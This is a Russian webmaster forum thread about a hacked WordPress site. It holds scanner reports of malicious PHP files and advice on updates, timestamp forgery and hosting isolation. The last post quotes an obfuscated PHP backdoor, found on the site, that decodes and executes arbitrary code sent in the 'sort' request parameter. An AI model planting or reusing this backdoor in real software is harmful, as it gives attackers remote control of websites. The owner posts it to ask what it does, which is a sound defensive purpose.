Вирус на сайте

12 3
Q
На сайте с 03.10.2011
Offline
301
6289

Добрый день.

Сегодня упало письмо, что сайт отключили, так как Услуга сайт «seo-progression.ru» в вашем заказе заблокирована по причине:На вашем заказе производился запуск вредоносного/резидентного ПО.

Сайт на wordpress

Яндекс и Гугл не ругались. Движок и плагины постоянно обновляю. На админку стоит дополнительный пароль через .htaccess.

Поддержка отсылает в другую компанию для лечения сайта, и не дает толком ответы.

Подскажите пожалуйста:

1 - Файлы на которые они ссылаются, созданы давно, 14 год. Правильно я понимаю, что их просто загрузили, и ждали время? Папка создана в 14 году, у файла стоит тоже 14 год, только месяц другой. Или как-то можно менять эту информацию.

2 - Что значит - запуск вредоносного/резидентного ПО? На сайт постоянно заходил, с компьютера и с мобильного, у меня антивирусы не ругались. Вот что мне прислали:

/www/seo-progression.ru/wp-content/./plugins/masterslider/admin/frhzvsbi.php: {HEX}php.generic.malware.440.UNOFFICIAL FOUND

/www/seo-progression.ru/wp-content/./plugins/sitemap-generator-wp/includes/ykwcaozg.php: {HEX}php.generic.malware.440.UNOFFICIAL FOUND

www/seo-progression.ru/wp-content/./plugins/contact-form-7/includes/validation.php: {HEX}php.generic.malware.441.UNOFFICIAL FOUND

www/seo-progression.ru/wp-content/./themes/swift/lib/hpuoeiiy.php: {HEX}php.generic.malware.440.UNOFFICIAL FOUND

/www/seo-progression.ru/wp-content/./uploads/2014/10/kskxgbfz.php: {HEX}php.generic.malware.440.UNOFFICIAL FOUNDК

3 - Как критично, если не обновлять темы? Тут возможен мой косяк, но я их не обновляю, так как слетает все потом, и приходится заново делать.

4 - На сколько критично заражение сайта для других? Правильно я понимаю, что сейчас другие тоже полетят. И не только мои, но и чужие, с которыми я нахожусь на одном винчестере. Недавно давал доступы к сайту, только к другому, может он что-то туда залил, что теперь у него есть доступы ко всем моим сайтам. Доступ давал только на определенную папку.

А так, круто, у сайта были хорошие позиции по Москве, теперь по ходу до свиданья топ ))

Twickbot
На сайте с 13.03.2017
Offline
56
#1
qvaro:
Или как-то можно менять эту информацию

Информация о дате создания файла в Linux без проблем меняется. Например, командой "touch -t".

qvaro:
у меня антивирусы не ругались.

АВ могут не ругаться, пока у них в базе не будет сигнатуры вируса. Потом сигнатура попадает в базу и АВ начинают ругаться.

Кстати, ругань АВ не означает 100% гарантии обнаружения вируса. Достаточно часты ложные срабатывания.

qvaro:
я их не обновляю, так как слетает все потом

Обновления - процедура неприятная, но, как правило крайне необходимая. Постоянно в различных движках находятся всякие дыры и разработчики их затыкают. Не делая обновлений риск быть взломанным сильно увеличивается.

qvaro:
На сколько критично заражение сайта для других? Правильно я понимаю, что сейчас другие тоже полетят

Зависит от настроек хостинга. Если из под пользователя одного сайта есть доступ к другим, то заражение очень вероятно.

Я свои сайты настраиваю так, чтобы Апач работал с каждым сайтом из под своего пользователя. Таким образом, если сайт взломают (а от этого никто не застрахован), доступа к другим сайтам не будет.

qvaro:
Доступ давал только на определенную папку

Опять же зависит от настроек. Если настроить неправильно, то, можно залить в эту папку PHP шелл, и иметь доступ к другим папкам, а то и гулять по всему серверу.

qvaro:
теперь по ходу до свиданья топ

Почистите, обновитесь и, думаю, вернете свои позиции.

Автоматизация работы в браузере. Пишу парсеры, постеры, кликеры, лайкеры, и т.п.
SeVlad
На сайте с 03.11.2008
Offline
1609
#2
qvaro:
/wp-content/./plugins

Почему тут точка?

Где реально эти каталоги? Есть ли дубли не на своих местах?

qvaro:
Как критично, если не обновлять темы? Тут возможен мой косяк, но я их не обновляю, так как слетает все потом, и приходится заново делать

Если тема/плагины с помойки, то всё.

Коды "из интернетов" тоже могут быть всякие.

А чтобы обновлять тему без особых проблем есть механизм дочерних тем.

ЗЫ, И когда ты уже будешь писать в правильные темы и разделы? Сеошник не может найти?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Q
На сайте с 03.10.2011
Offline
301
#3
SeVlad:
ЗЫ, И когда ты уже будешь писать в правильные темы и разделы?

где я еще не правильно написал в раздел? и это так принципиально?

SeVlad:
Сеошник не может найти?

по вашей логике, я искал раздел, и не мог найти/выбрать, куда же мне написать, я же сеошник.

моя логика, я обычно пишу в том разделе, вот и написал туда. про раздел безопасность забыл, точнее 1 раз в нем, а надо было бы по чаще заходить))

если по теме, то нашел еще на других сайтах проблемы, просто подгружается другая мобильная версия, и на зараженных сайтах появляется новый пользователь с правами админа - wp.service.controller. Также есть левые файлы, касперский ругается, и не дает открыть.

Один из сайтов полностью был обновлен, тема в том числе, плагинов минимум, и самые распространенные - All In One SEO Pack, Akismet Anti-Spam и другие.

На этом хостинге есть другие сайты, но пока не заражены. Такое ощущение, что в вп появилась дырка, и сейчас заражают сайты, так как думаю, другие сайты тоже были бы уже заражены.

S
На сайте с 30.09.2016
Offline
469
#4

1. У файла есть разные метки времени, Вы видите те, которые можно изменять. Но есть и та, которую злоумышленник не может произвольно установить.

2. Антивирусы и не будут ругаться при заходе на сайт, они эти файлы не увидят. Но файлы вредоносные, это видно по названиям.

3. Можете и не обновлять, если Вы досконально их проверили и уверены в их безопасности. Ну и самостоятельно следите за актуальностью версий ПО.

4. Если Ваши сайты на одном аккаунте, то заразить можно любой. Не имеет значения, что доступ только к одной папке, оттуда можно выйти куда угодно. Но человек, которого Вы нанимали для работы, ничего вредоносного заливать не будет, если не больной на всю голову.

На позиции сайта наличие вредоносных PHP-файлов никакого влияния не оказывает. Влияют результаты их работы, если они проявились при просмотре сайта.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Q
На сайте с 03.10.2011
Offline
301
#5
Sitealert:
На позиции сайта наличие вредоносных PHP-файлов никакого влияния не оказывает. Влияют результаты их работы, если они проявились при просмотре сайта.

мне сайт выключили))

---------- Добавлено 15.10.2017 в 21:51 ----------

Sitealert:
если не больной на всю голову.

по ходу на всю голову!

проверяю хостинг постоянно на вирусы, и проверял в начале недели. включил сегодня, а у меня там целый зоопарк ))

совпадение? не думаю))

S
На сайте с 30.09.2016
Offline
469
#6
qvaro:
совпадение? не думаю))

Стопудово совпадение. Программеру это ни к чему.

SeVlad
На сайте с 03.11.2008
Offline
1609
#7
qvaro:
где я еще не правильно написал в раздел?

Только за последнее время ты неск раз спрашивал про редирект в топике про ВП. Мало того, что топик не для этого (поэтому и ответов нет), так ты ещё и не нашел закреплённый специальный топик для этого.

И это не единственный раз.

qvaro:
и это так принципиально?

Если тебя не интересуют результат, то не очень.

qvaro:
по вашей логике, я искал раздел, и не мог найти/выбрать, куда же мне написать, я же сеошник.
моя логика, я обычно пишу в том разделе, вот и написал туда.

Ты ещё и вещества употребляешь? Бросай это дело.

qvaro:
Такое ощущение, что в вп появилась дырка,

Такое ощущение, что все безголовые видят проблемы где-то ещё, но только не в себе. И даже тот факт, что у таких проблем нет ни у кого* не заставляет их чуток подумать.

* У кого появляются проблемы с вирями/взломами/етс пытаются их решить. Нормальные отличаются от обиженных тем, что ищут проблему в своих действиях/условиях, а не выдвигают предположения космической глупости.

S
На сайте с 29.01.2006
Offline
404
#8

Видать, массовое заражение WP - я тоже пол-субботы проколупался с вируснёй (Гугл прислал письмо). Хер знает, как пробивают - отключил доступ по ftp и права на htaccess поставил только на чтение - вроде, прекратилось.

Дата не говорит ни о чём - у меня часть вирусных файлов были свежак (13 октября), а некоторые - произвольные старые даты.

SeVlad
На сайте с 03.11.2008
Offline
1609
#9
Scaryer:
Видать, массовое заражение WP

И на Солнце пятна от пожаров в Калифорнии :)

Q
На сайте с 03.10.2011
Offline
301
#10

нашел на сайте код, подскажите, что значит? очень опасно?

if(isset($_REQUEST['sort'])){	

$string = $_REQUEST['sort'];
$array_name = '';
$alphabet = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";
$ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7);
foreach($ar as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
exit();
}
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий